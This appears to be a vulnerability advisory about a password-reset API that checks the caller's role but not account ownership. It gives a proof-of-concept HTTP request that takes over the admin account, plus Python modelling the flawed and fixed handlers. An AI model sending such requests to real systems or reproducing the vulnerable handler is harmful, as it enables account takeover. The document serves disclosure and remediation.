# Description
The password change function does not properly enforce the `Change Password` role: it checks only that the caller holds the role, not that the caller owns the account being changed. Any user with this role enabled can therefore change the password of any other user in the system, including the administrator account.
# Proof of Concept
1. Log in as a normal user that can change its own password.
2. Send the following request:
```
POST /api/account/reset-password HTTP/1.1
Host: localhost:5000
Content-Type: application/json
Authorization: Bearer
{"username":"admin","password":"admintakeover"}
```
3. The `admin` password is changed successfully.
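The root cause described above is a missing ownership check: the handler verifies the caller's role but takes the target account from the request body. The Python below is an added illustration, not the affected project's code. It models the handler as reported next to a hardened version that binds the target account to the authenticated caller, and replays the proof-of-concept request against both. The user store, the `User` class, the `Admin` role and the function names are assumptions made for this example.

```python
from dataclasses import dataclass, field


@dataclass
class User:
    """Constructed in-memory account record (not the project's data model)."""
    username: str
    password: str
    roles: set = field(default_factory=set)


class Forbidden(Exception):
    """Raised when an authorization check fails (maps to HTTP 403)."""


def make_store() -> dict:
    """Fresh constructed user store so each call starts from a known state."""
    return {
        "admin": User("admin", "original-admin-secret", {"Admin", "Change Password"}),
        "alice": User("alice", "alice-pass", {"Change Password"}),
    }


def reset_password_vulnerable(store: dict, caller_name: str, body: dict) -> str:
    """Mirrors the flaw in the report: only the caller's role is checked.
    The target account comes from the attacker-controlled JSON body, so any
    holder of `Change Password` can overwrite any account's password."""
    caller = store[caller_name]
    if "Change Password" not in caller.roles:
        raise Forbidden("missing Change Password role")
    target = store[body["username"]]   # never compared with the caller
    target.password = body["password"]
    return target.username


def reset_password_fixed(store: dict, caller_name: str, body: dict) -> str:
    """Hardened handler: `Change Password` only permits a self-service change.
    The target is the authenticated principal, and a client-supplied username
    that names any other account is rejected before any state changes."""
    caller = store[caller_name]
    if "Change Password" not in caller.roles:
        raise Forbidden("missing Change Password role")
    if body.get("username") != caller.username:
        raise Forbidden("cannot change another user's password")
    caller.password = body["password"]
    return caller.username


def replay_poc() -> dict:
    """Replay the report's request body as the low-privileged user `alice`
    against both handlers and report whether the admin password changed."""
    poc_body = {"username": "admin", "password": "admintakeover"}
    results = {}
    for name, handler in (("vulnerable", reset_password_vulnerable),
                          ("fixed", reset_password_fixed)):
        store = make_store()
        try:
            handler(store, "alice", poc_body)
            outcome = "accepted"
        except Forbidden as exc:
            outcome = f"rejected: {exc}"
        results[name] = {
            "outcome": outcome,
            "admin_password_changed": store["admin"].password == "admintakeover",
        }
    return results


if __name__ == "__main__":
    for handler_name, result in replay_poc().items():
        print(handler_name, result)
```

The hardened version deliberately ignores the body's `username` as a selector and only uses it for a consistency check; deriving the target from the bearer-authenticated session is what closes the hole. Whether a separate administrative path should exist for resetting other users' passwords is not covered by the report and is left out of the example.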